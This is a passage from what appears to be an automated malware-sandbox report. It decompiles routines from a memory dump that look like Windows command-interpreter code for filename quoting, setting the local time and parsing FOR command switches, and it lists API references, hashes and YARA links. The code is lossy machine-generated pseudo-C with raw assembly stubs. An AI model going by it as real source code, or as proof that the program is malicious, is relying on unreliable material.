				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E0035B4DD(0);
				_t157 = 0x2c;
				_t191 = E003400B0(_t157);
				if(_t191 == 0) {
					E00359287(_t157);
					__imp__longjmp(0x36b8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E0033CB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E00343B5D(_t159,  &_v124) == 1) {
					L57:
					E00345D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E00344800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E00345590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E00359C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x37853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x37853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x37853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E00340040(_t154[0xc]);
								E00340040(_t154[2]);
								E00340040(_t154);
								E00345D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E00346FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}

0x0035aef0
0x0035aef7
0x0035aefd
0x0035aeff
0x0035af08
0x0035af10
0x0035af15
0x0035af19
0x0035af1c
0x0035af1f
0x0035af22
0x0035af25
0x0035af28
0x0035af2b
0x0035af2e
0x0035af31
0x0035af34
0x0035af37
0x0035af3a
0x0035af3d
0x0035af43
0x0035af44
0x0035af45
0x0035af46
0x0035af4a
0x0035af50
0x0035af53
0x0035af56
0x0035af59
0x0035af5c
0x0035af5f
0x0035af62
0x0035af63
0x0035af64
0x0035af65
0x0035af6c
0x0035af72
0x0035af76
0x0035af78
0x0035af84
0x0035af84
0x0035af8d
0x0035af92
0x0035af9b
0x0035af9d
0x0035afa0
0x0035afa5
0x0035afaa
0x0035b2a5
0x0035b2a5
0x0035b2aa
0x0035afbe
0x0035afc1
0x0035afd1
0x00000000
0x0035afd7
0x0035afd9
0x0035afe3
0x0035afe8
0x0035afef
0x00000000
0x0035aff5
0x0035aff8
0x0035b007
0x0035b00d
0x0035b00d
0x0035b012
0x0035b015
0x0035b019
0x0035b01c
0x0035b01e
0x0035b01f
0x0035b01f
0x0035b025
0x00000000
0x00000000
0x0035b02a
0x0035b066
0x0035b068
0x0035b068
0x0035b071
0x0035b074
0x0035b077
0x00000000
0x0035b02c
0x0035b02c
0x0035b032
0x0035b036
0x0035b03c
0x0035b040
0x0035b043
0x0035b043
0x0035b04b
0x0035b04f
0x0035b051
0x0035b078
0x0035b078
0x0035b07a
0x0035b07c
0x0035b07c
0x0035b04f
0x0035b088
0x00000000
0x00000000
0x00000000
0x0035b088
0x0035b08c
0x0035b08f
0x0035b092
0x0035b098
0x0035b09e
0x0035b0a4
0x0035b0ad
0x00000000
0x0035b0b3
0x0035b0b5
0x0035b0bb
0x0035b0bd
0x0035b0c2
0x0035b0c8
0x0035b0cb
0x0035b0d3
0x0035b0d6
0x0035b0d8
0x0035b0d8
0x0035b0de
0x00000000
0x00000000
0x0035b0e3
0x0035b0fa
0x0035b0fa
0x0035b0e5
0x0035b0e5
0x0035b0e9
0x0035b0ed
0x00000000
0x0035b0ef
0x0035b0ef
0x0035b0f2
0x0035b0f8
0x00000000
0x00000000
0x00000000
0x00000000
0x0035b0f8
0x0035b0ed
0x0035b103
0x0035b105
0x0035b10b
0x0035b110
0x0035b112
0x0035b112
0x0035b118
0x00000000
0x00000000
0x0035b11d
0x0035b134
0x0035b134
0x0035b136
0x0035b11f
0x0035b11f
0x0035b123
0x0035b127
0x00000000
0x0035b129
0x0035b129
0x0035b12c
0x0035b132
0x00000000
0x00000000
0x00000000
0x00000000
0x0035b132
0x0035b127
0x0035b141
0x0035b143
0x0035b149
0x0035b14c
0x0035b14c
0x0035b14f
0x0035b152
0x0035b157
0x0035b15f
0x0035b163
0x0035b16f
0x0035b175
0x0035b183
0x0035b188
0x0035b18e
0x0035b193
0x0035b29a
0x0035b199
0x0035b19f
0x0035b1a2
0x0035b1a8
0x0035b1ae
0x0035b1b0
0x0035b1b2
0x0035b1c2
0x0035b1c4
0x0035b1c4
0x0035b1c8
0x0035b1cb
0x0035b1ce
0x0035b1d0
0x0035b1d5
0x0035b1d8
0x0035b1de
0x0035b1de
0x0035b1e4
0x0035b1e4
0x0035b1f0
0x0035b1f5
0x0035b1f9
0x0035b1fa
0x0035b1fd
0x0035b1fd
0x0035b200
0x0035b20a
0x0035b218
0x0035b220
0x0035b22b
0x0035b230
0x0035b233
0x0035b236
0x0035b23a
0x0035b23e
0x0035b23f
0x0035b242
0x0035b253
0x0035b253
0x0035b258
0x0035b25e
0x0035b261
0x0035b261
0x0035b188
0x00000000
0x0035b143
0x0035b13a
0x0035b13c
0x0035b13f
0x00000000
0x0035b13f
0x00000000
0x0035b105
0x0035b0fe
0x0035b100
0x00000000
0x0035b264
0x0035b264
0x0035b265
0x0035b268
0x0035b0c8
0x0035b277
0x0035b27f
0x0035b286
0x0035b28b
0x0035b290
0x0035b290
0x0035b0ad
0x0035afef
0x0035afd1
0x0035b2bc

APIs

Part of subcall function 0035B4DD: free.MSVCRT(?,0000000A,00000000,?,003535C4), ref: 0035B4FB
Part of subcall function 0035B4DD: free.MSVCRT(?,0000000A,00000000,?,003535C4), ref: 0035B508

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

longjmp.MSVCRT(0036B8B8,00000001,00000000,?,00000000), ref: 0035AF84
qsort.MSVCRT ref: 0035B007
wcschr.MSVCRT ref: 0035B05C
calloc.MSVCRT ref: 0035B09E
calloc.MSVCRT ref: 0035B16F
wcschr.MSVCRT ref: 0035B1B8
memcpy.MSVCRT ref: 0035B20A
memcpy.MSVCRT ref: 0035B22B

Strings

&()[]{}^=;!%'+,`~, xrefs: 0035B057, 0035B1B3

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
String ID: &()[]{}^=;!%'+,`~
API String ID: 975110957-381716982
Opcode ID: 2c8d470d61d69ade4ee611a5a8abb116c9fe7d233226d0f750ca56ab8233a0df
Instruction ID: a07392c948dd2a5758ca1a1df460de8de0d9038edf88614ec855d2f82181f88b
Opcode Fuzzy Hash: 2c8d470d61d69ade4ee611a5a8abb116c9fe7d233226d0f750ca56ab8233a0df
Instruction Fuzzy Hash: 68C1C176A002149BDB268F68DC41BAEF7B1FF44711F15406EE848EB392EB309D49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00353CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00353CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x35f81c;
					E00341040( &_v34, 0xd, 0x35f7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E003418C0( &_v40, 0x10, 0x35f80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x35d540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E0033C108(_t91);
									_t129 = _t128 + 8;
								} else {
									E0033C108(_t91, _t44, 1, 0x35f80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E00353B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E00340178(_t51) == 0) {
											_push( &_v604);
											E003425D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E0033C108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E00346FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E00341040( &_v604, 0x105, _t88);
								L35:
								E00341040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E0033EA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E00354159( &_v620, _t113);
									} else {
										_t61 = E00353FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E0033C108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E0033C5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x00353cd2
0x00353cd9
0x00353cde
0x00353ce0
0x00353ce5
0x00353d3b
0x00353d48
0x00353d4f
0x00353d53
0x00000000
0x00353ce7
0x00353ce7
0x00353cef
0x00353cf4
0x00353cf7
0x00353d01
0x00353d08
0x00000000
0x00000000
0x00353d0a
0x00353d0d
0x00353d10
0x00353d13
0x00000000
0x00000000
0x00353d1b
0x00353d1b
0x00353d1e
0x00353d20
0x00353d23
0x00353d2e
0x00000000
0x00353d58
0x00353d58
0x00353d5a
0x00353d98
0x00353d9d
0x00353da0
0x00353db5
0x00353da2
0x00353da5
0x00353dae
0x00353da7
0x00353da7
0x00353da7
0x00353da5
0x00353dbc
0x00353dd0
0x00353dd2
0x00353dd7
0x00353ddc
0x00353dbe
0x00353dc6
0x00353dcb
0x00353dcb
0x00353ded
0x00353df3
0x00353df6
0x00353e05
0x00000000
0x00353e0b
0x00353e0b
0x00353e13
0x00000000
0x00000000
0x00353e1b
0x00353e23
0x00353e29
0x00353e33
0x00353e59
0x00353e62
0x00353e6a
0x00353e70
0x00353e75
0x00353e75
0x00000000
0x00353e62
0x00353e35
0x00353e38
0x00353e44
0x00353e48
0x00353e4b
0x00353e50
0x00000000
0x00000000
0x00000000
0x00353e52
0x00353e54
0x00353e56
0x00000000
0x00353e56
0x00353d62
0x00353d62
0x00353d64
0x00353d64
0x00353d67
0x00353d67
0x00353d6a
0x00353d6d
0x00353d74
0x00353d7c
0x00353f94
0x00353f96
0x00353fa1
0x00353fa2
0x00353fa7
0x00353faa
0x00353faa
0x00353faf
0x00353fbf
0x00353fbf
0x00353d8e
0x00353e78
0x00353e84
0x00353e89
0x00353e8e
0x00353e97
0x00353e9d
0x00353ea0
0x00353ea3
0x00000000
0x00000000
0x00000000
0x00353ea3
0x00353eb0
0x00353eb2
0x00353eb6
0x00353efe
0x00353f00
0x00353f0e
0x00353f14
0x00353fd0
0x00353fd0
0x00000000
0x00353fd0
0x00353f21
0x00353f2a
0x00353f2c
0x00353f32
0x00353f35
0x00353f3e
0x00353f37
0x00353f37
0x00353f37
0x00353f45
0x00353f72
0x00353f76
0x00353f78
0x00353f82
0x00353f83
0x00353f88
0x00353f8b
0x00000000
0x00353f47
0x00353f4e
0x00353f63
0x00000000
0x00000000
0x00353f70
0x00353fc0
0x00353fc8
0x00353fc9
0x00000000
0x00353fc9
0x00000000
0x00353f70
0x00353f45
0x00353ec0
0x00353ec3
0x00353ec5
0x00353ef6
0x00353ef6
0x00353ef9
0x00353efb
0x00000000
0x00353efb
0x00353ecc
0x00353ed1
0x00353ed7
0x00353edb
0x00353ee2
0x00000000
0x00000000
0x00353ee4
0x00353ee7
0x00353ee8
0x00353eeb
0x00353eee
0x00000000
0x00000000
0x00000000
0x00353ef0
0x00353ef4
0x00000000
0x00000000
0x00000000
0x00353ef4
0x00353d5a
0x00353d58
0x00353d19
0x00000000
0x00000000
0x00000000
0x00353d19

APIs

_get_osfhandle.MSVCRT ref: 00353DED
GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 00353F21
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 00353F4E
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 00353F5B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 00353F65
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 00353FC2

Strings

%s, xrefs: 00353E6B
/-., xrefs: 00353CEA
:, xrefs: 00353D48

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: LocalTime$ErrorLast$_get_osfhandle
String ID: %s$/-.$:
API String ID: 1033501010-879152773
Opcode ID: b2b2beed4287c50d6a5687dfab74a0bee5a27896db306515389372c682861f94
Instruction ID: a0d56da566c6cae409e16a8c29592c6bc881f69af37084e291b5a3544ea62f42
Opcode Fuzzy Hash: b2b2beed4287c50d6a5687dfab74a0bee5a27896db306515389372c682861f94
Instruction Fuzzy Hash: AF811532A0021587DB27AA64CC4AFFA33F9AF40782F114565EC06EB5B4EA759F4DCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00339A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00339A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x36faa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x36faa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x36fa8c = 0x1e;
				_t101 = E0033E9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x36faa0 = _t31;
					_t32 = 0x3f;
					 *0x36faa2 = _t32;
					 *0x36faa4 = 0;
				} else {
					_t63 = 0;
					E0033F030(0);
				}
				_t88 = 0x2b;
				if(E0033DCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x373cc9 == 0) {
						L13:
						if( *0x36faa0 != _t36) {
							L45:
							E003582EB(_t63);
							L17:
							_push(0x36faa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E00339C73( *(_t101 + 0x38), _t89);
							E00339C4D(L"IN");
							_push(0x36faa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E00339C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E00339936(_t60);
							E00339C4D(L"DO");
							_push(0x36faa0);
							_t91 = 8;
							E00341040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E0033DC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E003582EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x36faa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x36faa2 & 0x0000ffff;
						if(E0033D7D4(L"=,;",  *0x36faa2 & 0x0000ffff) != 0 ||  *0x36fa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x36faa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x36faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E0033F030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x36faa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x36faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E0033F030(0);
								_t36 =  *0x36faa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E003582EB(_t80);
								}
								_t63 = 6 +  *0x36fa8c * 2;
								_t52 = E003400B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E00359287(_t63);
									__imp__longjmp(0x36b8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E003582EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x36fa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E00341040(_t52, _t94, 0x36faa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x36faa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E0033F030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E003582EB(0);
								}
								_t36 =  *0x36faa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x36fa8c * 2;
									_t52 = E003400B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x36fa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}

0x00339a34
0x00339a36
0x00339a3e
0x00339a40
0x00351097
0x0035109d
0x0035109d
0x00339a48
0x00339a49
0x00339a58
0x00339a5c
0x00339a5f
0x003510a3
0x003510ab
0x003510ac
0x003510b4
0x00339a65
0x00339a65
0x00339a67
0x00339a67
0x00339a6e
0x00339a76
0x003510bf
0x003510c3
0x00000000
0x00339a7c
0x00339a7c
0x00339a89
0x00339a8a
0x00339b0a
0x00339b11
0x00351154
0x00351154
0x00339b57
0x00339b5f
0x00339b60
0x00339b63
0x00339b64
0x00339b6e
0x00339b76
0x00339b77
0x00339b7a
0x00339b7b
0x00339b8a
0x00339b8d
0x00339b95
0x00339b9b
0x00339b9c
0x00339ba3
0x00339ba4
0x00339ba9
0x00339bae
0x0035115e
0x0035115e
0x00339bb5
0x00339bb8
0x00339bb8
0x00339b1f
0x00339b25
0x00339b28
0x00000000
0x00000000
0x00339b35
0x00339b3a
0x00339b44
0x00000000
0x00000000
0x00000000
0x00000000
0x00339a8c
0x00339a8f
0x00339a99
0x00339aa3
0x00000000
0x00000000
0x00339aa9
0x00339ab3
0x00339abd
0x00339c3b
0x00339c19
0x00339c1b
0x00339a8f
0x00339a99
0x00339aa3
0x00000000
0x00000000
0x00000000
0x00339aa3
0x00000000
0x00339a8f
0x00339acd
0x00339ad7
0x00339bb9
0x00339bbf
0x00339bc4
0x00339bcc
0x00339bcd
0x00339bd0
0x00000000
0x00000000
0x00339bd8
0x00339bd9
0x00339bdc
0x00000000
0x00000000
0x00339be2
0x00339be6
0x00339c46
0x00339c46
0x00339bed
0x00339bf4
0x00339bf9
0x00339bfb
0x00351127
0x00351127
0x00351132
0x00351138
0x00351138
0x0035113b
0x00351141
0x00351144
0x0035114a
0x0035114a
0x00351144
0x00339b07
0x00339b09
0x00000000
0x00339c01
0x00339c07
0x00339c0a
0x00339c11
0x00339c14
0x00000000
0x00339c14
0x00339bfb
0x00339ae7
0x00339aef
0x00339af4
0x003510d1
0x003510d6
0x003510db
0x003510df
0x003510e1
0x003510e1
0x003510e6
0x003510ee
0x003510ef
0x003510f2
